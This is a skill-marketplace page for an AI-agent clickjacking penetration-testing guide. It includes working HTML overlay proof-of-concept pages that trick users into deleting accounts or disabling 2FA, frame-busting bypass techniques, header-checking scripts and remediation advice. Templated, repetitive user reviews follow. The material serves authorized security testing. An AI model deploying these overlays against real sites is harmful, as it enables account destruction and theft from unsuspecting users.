performing-clickjacking-attack-test▌
mukul975/Anthropic-Cybersecurity-Skills · updated May 25, 2026
MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.
Testing web applications for clickjacking vulnerabilities by assessing frame embedding controls and crafting proof-of-concept overlay attacks during authorized security assessments.
| name | performing-clickjacking-attack-test |
| description | Testing web applications for clickjacking vulnerabilities by assessing frame embedding controls and crafting proof-of-concept overlay attacks during authorized security assessments. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | - penetration-testing - clickjacking - ui-redressing - web-security - owasp - x-frame-options |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| atlas_techniques | - AML.T0024 - AML.T0035 |
| nist_ai_rmf | - MEASURE-2.8 - MAP-5.1 |
| nist_csf | - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 |
Performing Clickjacking Attack Test
When to Use
- During authorized penetration tests when assessing UI redressing vulnerabilities
- When testing whether sensitive actions (delete account, transfer funds, change settings) can be performed via clickjacking
- For evaluating the effectiveness of X-Frame-Options and Content-Security-Policy frame-ancestors directives
- When assessing applications that process one-click actions without additional confirmation
- During security audits of applications handling financial transactions or account management
Prerequisites
- Authorization: Written penetration testing agreement for the target
- Web browser: Modern browser for testing iframe embedding
- Local web server: Python
http.serveror similar for hosting PoC pages - Burp Suite: For examining response headers
- HTML/CSS knowledge: For crafting clickjacking overlay pages
- curl: For checking framing headers on target pages
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Workflow
Step 1: Check Frame Embedding Protections
Examine response headers for anti-clickjacking defenses.
# Check X-Frame-Options header
curl -s -I "https://target.example.com/" | grep -i "x-frame-options"
# Expected values:
# X-Frame-Options: DENY (blocks all framing)
# X-Frame-Options: SAMEORIGIN (allows same-origin framing)
# X-Frame-Options: ALLOW-FROM https://trusted.com (deprecated, limited support)
# Check Content-Security-Policy frame-ancestors directive
curl -s -I "https://target.example.com/" | grep -i "content-security-policy"
# Look for: frame-ancestors 'none' or frame-ancestors 'self'
# frame-ancestors 'none' = equivalent to DENY
# frame-ancestors 'self' = equivalent to SAMEORIGIN
# Test multiple sensitive pages
for page in / /account/settings /account/delete /transfer \
/admin/dashboard /change-password /change-email; do
echo -n "$page: "
headers=$(curl -s -I "https://target.example.com$page")
xfo=$(echo "$headers" | grep -i "x-frame-options" | tr -d '\r')
csp=$(echo "$headers" | grep -i "content-security-policy" | grep -o "frame-ancestors[^;]*" | tr -d '\r')
if [ -z "$xfo" ] && [ -z "$csp" ]; then
echo "NO PROTECTION"
else
echo "${xfo:-none} | ${csp:-none}"
fi
done
# Check if JavaScript frame-busting is used (weak protection)
curl -s "https://target.example.com/" | grep -i "top.location\|parent.location\|frameElement"
Step 2: Test Basic Iframe Embedding
Attempt to embed the target page in an iframe to confirm vulnerability.
<!-- basic-frame-test.html -->
<html>
<head><title>Clickjacking Frame Test</title></head>
<body>
<h1>Frame Embedding Test</h1>
<p>If the target page loads below, it is vulnerable to clickjacking.</p>
<!-- Test basic framing -->
<iframe src="https://target.example.com/account/settings"
width="800" height="600"
style="border: 2px solid red;">
</iframe>
<p>If you see "Refused to display" in console or blank iframe,
the page has frame protection.</p>
</body>
</html>
# Host the test page
cd /tmp
cat > frame-test.html << 'EOF'
<html>
<body>
<h1>Clickjacking Test</h1>
<iframe src="https://target.example.com/account/settings"
width="800" height="600"></iframe>
</body>
</html>
EOF
python3 -m http.server 8888
# Open http://localhost:8888/frame-test.html in browser
# Check browser console for framing errors
Step 3: Craft Clickjacking Proof of Concept
Build an overlay attack that tricks users into clicking hidden elements.
<!-- clickjacking-poc.html -->
<html>
<head>
<title>Win a Prize!</title>
<style>
body {
margin: 0;
padding: 0;
font-family: Arial, sans-serif;
}
/* Invisible iframe containing target page */
#target-frame {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
opacity: 0.0001; /* Nearly invisible */
z-index: 2; /* On top of decoy */
border: none;
}
/* Decoy content that tricks the user */
#decoy {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 1;
background: white;
}
/* Position the "Click here" button exactly over the target's
sensitive button (adjust top/left values based on target layout) */
#click-bait {
position: absolute;
top: 350px; /* Align with target's "Delete Account" button */
left: 400px; /* Align horizontally */
padding: 15px 30px;
background: #4CAF50;
color: white;
font-size: 18px;
cursor: pointer;
border: none;
border-radius: 5px;
}
</style>
</head>
<body>
<!-- Decoy content visible to the user -->
<div id="decoy">
<h1 style="text-align:center; margin-top:100px;">
Congratulations! You Won!
</h1>
<p style="text-align:center;">
Click the button below to claim your prize
</p>
<button id="click-bait">CLAIM PRIZE</button>
</div>
<!-- Hidden iframe with target's sensitive action -->
<iframe id="target-frame"
src="https://target.example.com/account/delete"
scrolling="no">
</iframe>
</body>
</html>
Step 4: Create Multi-Step Clickjacking Attack
For actions requiring multiple clicks, create a multi-step overlay.
<!-- multi-step-clickjacking.html -->
<html>
<head>
<title>Complete Survey</title>
<style>
#target-frame {
position: absolute;
width: 100%;
height: 100%;
opacity: 0.0001;
z-index: 2;
border: none;
}
#step-container {
text-align: center;
margin-top: 200px;
z-index: 1;
position: relative;
}
.step { display: none; }
.step.active { display: block; }
.btn {
padding: 15px 40px;
font-size: 18px;
background: #2196F3;
color: white;
border: none;
cursor: pointer;
margin-top: 20px;
}
</style>
</head>
<body>
<div id="step-container">
<!-- Step 1: Click aligns with "Settings" link on target -->
<div class="step active" id="step1">
<h2>Step 1: Select your reward</h2>
<button class="btn" onclick="nextStep()"
style="position:absolute; top:200px; left:300px;">
Gold Package
</button>
</div>
<!-- Step 2: Click aligns with "Delete Account" button -->
<div class="step" id="step2">
<h2>Step 2: Confirm your choice</h2>
<button class="btn" onclick="nextStep()"
style="position:absolute; top:350px; left:400px;">
Confirm
</button>
</div>
<!-- Step 3: Click aligns with "Yes, I'm sure" confirmation -->
<div class="step" id="step3">
<h2>Step 3: Claim reward!</h2>
<button class="btn"
style="position:absolute; top:400px; left:450px;">
Claim Now!
</button>
</div>
</div>
<iframe id="target-frame"
src="https://target.example.com/account/settings">
</iframe>
<script>
var currentStep = 1;
function nextStep() {
document.getElementById('step' + currentStep).classList.remove('active');
currentStep++;
document.getElementById('step' + currentStep).classList.add('active');
// Optionally change iframe src for multi-page flows
}
</script>
</body>
</html>
Step 5: Test Frame-Busting Bypass Techniques
If JavaScript-based frame protection is used, attempt to bypass it.
<!-- Bypass frame-busting JavaScript -->
<!-- Technique 1: sandbox attribute blocks top-level navigation -->
<iframe src="https://target.example.com/account/settings"
sandbox="allow-scripts allow-forms allow-same-origin"
width="800" height="600">
</iframe>
<!-- sandbox without allow-top-navigation prevents frame-busting -->
<!-- Technique 2: Double framing -->
<!-- If target checks: if (top !== self) top.location = self.location -->
<!-- Frame the page through an intermediate page that also frames -->
<iframe src="intermediate.html" width="800" height="600"></iframe>
<!-- intermediate.html contains: <iframe src="https://target.example.com/..."> -->
<!-- Technique 3: Intercept onbeforeunload -->
<script>
window.onbeforeunload = function() {
return "Are you sure?"; // Prevents navigation away
};
</script>
<iframe src="https://target.example.com/account/settings"
width="800" height="600">
</iframe>
<!-- Technique 4: Using data: URI or about:blank -->
<iframe id="f" src="about:blank" width="800" height="600"></iframe>
<script>
var iframe = document.getElementById('f');
iframe.contentDocument.write(
'<iframe src="https://target.example.com/account/settings" width="100%" height="100%"></iframe>'
);
</script>
Step 6: Validate Impact and Document Finding
Confirm that the clickjacking leads to meaningful impact.
# Host the PoC and test the attack flow
cd /tmp
python3 -m http.server 8888
# Testing steps:
# 1. Log in to target.example.com in the browser
# 2. Open http://localhost:8888/clickjacking-poc.html
# 3. Click the decoy button
# 4. Verify the sensitive action was performed on the target
# For report: adjust iframe opacity to show overlap
# Change opacity from 0.0001 to 0.5 for screenshot evidence
# This shows the target page visible behind the decoy content
# Document which sensitive actions are vulnerable:
# - Account deletion
# - Password/email change
# - Fund transfer
# - Permission/role changes
# - Enabling/disabling security features
Key Concepts
| Concept | Description |
|---|---|
| Clickjacking | UI redressing attack that tricks users into clicking hidden elements by overlaying decoy content |
| X-Frame-Options | HTTP header controlling whether a page can be embedded in iframes (DENY, SAMEORIGIN) |
| frame-ancestors | CSP directive specifying valid parents for iframe embedding (supersedes X-Frame-Options) |
| Frame Busting | JavaScript-based defense that attempts to break out of iframes (easily bypassable) |
| Likejacking | Clickjacking variant targeting social media "Like" or "Share" buttons |
| Cursorjacking | Variant using CSS to offset the visible cursor from the actual click position |
| Multi-step Clickjacking | Attack requiring multiple clicks, with decoy content changing at each step |
Tools & Systems
| Tool | Purpose |
|---|---|
| Burp Suite Professional | Examining X-Frame-Options and CSP headers on responses |
| Clickjack Tester (browser) | Browser-based iframe embedding test tool |
| Browser DevTools | Inspecting frame embedding behavior and console errors |
| Python http.server | Hosting clickjacking PoC pages locally |
| OWASP ZAP | Automated detection of missing anti-framing headers |
| securityheaders.com | Online scanner for missing security headers |
Common Scenarios
Scenario 1: Account Deletion via Clickjacking
The account deletion page at /account/delete has no X-Frame-Options header. An attacker creates a page with a "Win a prize" button positioned over the "Delete My Account" button in a transparent iframe.
Scenario 2: One-Click Fund Transfer
A banking application performs transfers via a single button click on a pre-filled form. Without frame protection, the attacker embeds the transfer page in an iframe and overlays a decoy "Play Game" button.
Scenario 3: 2FA Disable via Multi-Step Clickjacking
Disabling two-factor authentication requires two clicks (settings link, then disable button). A multi-step clickjacking PoC guides the victim through two decoy clicks that align with the real buttons.
Scenario 4: OAuth Authorization Clickjack
An OAuth consent screen allows framing. The attacker embeds the consent page and tricks the victim into clicking "Authorize", granting the attacker's application access to the victim's account.
Output Format
## Clickjacking Vulnerability Finding
**Vulnerability**: Clickjacking - Missing Frame Embedding Protection
**Severity**: Medium (CVSS 6.1)
**Location**: /account/settings, /account/delete, /transfer
**OWASP Category**: A04:2021 - Insecure Design
### Headers Analysis
| Page | X-Frame-Options | CSP frame-ancestors | Vulnerable |
|------|----------------|--------------------|-|
| / | Not set | Not set | Yes |
| /account/settings | Not set | Not set | Yes |
| /account/delete | Not set | Not set | Yes |
| /transfer | Not set | Not set | Yes |
| /login | SAMEORIGIN | - | No |
### Sensitive Actions Exploitable
1. Account deletion (single click, no re-authentication)
2. Email change (single click, no confirmation)
3. 2FA disable (two clicks, multi-step PoC)
4. Fund transfer (pre-filled form, single click)
### Impact
- Account takeover via email change clickjacking
- Account destruction via delete clickjacking
- Financial loss via transfer clickjacking
- Security downgrade via 2FA disable clickjacking
### Recommendation
1. Add `Content-Security-Policy: frame-ancestors 'none'` to all pages
2. Set `X-Frame-Options: DENY` as fallback for older browsers
3. Require re-authentication for sensitive actions (delete, transfer)
4. Add confirmation dialogs that cannot be pre-filled or auto-submitted
5. Implement SameSite=Strict cookies to reduce session availability in frames
How to use performing-clickjacking-attack-test on Cursor
AI-first code editor with Composer
Prerequisites
Before installing skills in Cursor, ensure your development environment meets these requirements:
- ›Cursor installed and configured on your development machine
- ›Node.js version 16.0+ with npm package manager (verify with
node --version) - ›Active project directory or workspace where you want to add performing-clickjacking-attack-test
Execute installation command
Execute the skills CLI command in your project's root directory to begin installation:
The skills CLI fetches performing-clickjacking-attack-test from GitHub repository mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
Select Cursor when prompted
The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:
Verify installation
Confirm successful installation by checking the skill directory location:
Reload or restart Cursor to activate performing-clickjacking-attack-test. Access the skill through slash commands (e.g., /performing-clickjacking-attack-test) or your agent's skill management interface.
Security & Verification Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.
List & Monetize Your Skill
Submit your Claude Code skill and start earning
Use Cases▌
Task Automation & Efficiency
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Knowledge Enhancement
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Quality Improvement
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
Implementation Guide▌
Prerequisites
- ›Claude Desktop or compatible AI client with skill support
- ›Clear understanding of task or problem to solve
- ›Willingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Installation Steps
- 1.Install skill using provided installation command
- 2.Test with simple use case relevant to your work
- 3.Evaluate output quality and relevance
- 4.Iterate on prompts to improve results
- 5.Integrate into regular workflow if valuable
Common Pitfalls
- ⚠Expecting perfect results without iteration
- ⚠Not providing enough context in prompts
- ⚠Using skill for tasks outside its intended scope
- ⚠Accepting outputs without review and validation
Best Practices▌
✓ Do
- +Start with clear, specific prompts
- +Provide relevant context and constraints
- +Review and refine all outputs before using
- +Iterate to improve output quality
- +Document successful prompt patterns
✗ Don't
- −Don't use without understanding skill limitations
- −Don't skip validation of outputs
- −Don't share sensitive information in prompts
- −Don't expect skill to replace human judgment
💡 Pro Tips
- ★Be specific about desired format and style
- ★Ask for multiple options to choose from
- ★Request explanations to understand reasoning
- ★Combine AI efficiency with human expertise
When to Use This▌
✓ Use When
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid When
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path▌
- 1Familiarize yourself with skill capabilities and limitations
- 2Start with low-risk, non-critical tasks
- 3Progress to more complex and valuable use cases
- 4Build expertise through regular use and experimentation
Discussion
Product Hunt–style comments (not star reviews)- No comments yet — start the thread.
Ratings
4.6★★★★★67 reviews- ★★★★★Olivia Liu· Dec 24, 2024
Solid pick for teams standardizing on skills: performing-clickjacking-attack-test is focused, and the summary matches what you get after install.
- ★★★★★William Haddad· Dec 24, 2024
Registry listing for performing-clickjacking-attack-test matched our evaluation — installs cleanly and behaves as described in the markdown.
- ★★★★★Noah Reddy· Dec 16, 2024
Useful defaults in performing-clickjacking-attack-test — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
- ★★★★★Tariq Sethi· Dec 12, 2024
I recommend performing-clickjacking-attack-test for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
- ★★★★★William Farah· Dec 8, 2024
performing-clickjacking-attack-test fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
- ★★★★★Tariq Shah· Dec 8, 2024
I recommend performing-clickjacking-attack-test for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
- ★★★★★Fatima Khan· Nov 27, 2024
performing-clickjacking-attack-test has been reliable in day-to-day use. Documentation quality is above average for community skills.
- ★★★★★Ava Gonzalez· Nov 27, 2024
Keeps context tight: performing-clickjacking-attack-test is the kind of skill you can hand to a new teammate without a long onboarding doc.
- ★★★★★Noah Dixit· Nov 15, 2024
We added performing-clickjacking-attack-test from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
- ★★★★★Zara Shah· Nov 7, 2024
performing-clickjacking-attack-test reduced setup friction for our internal harness; good balance of opinion and flexibility.
showing 1-10 of 67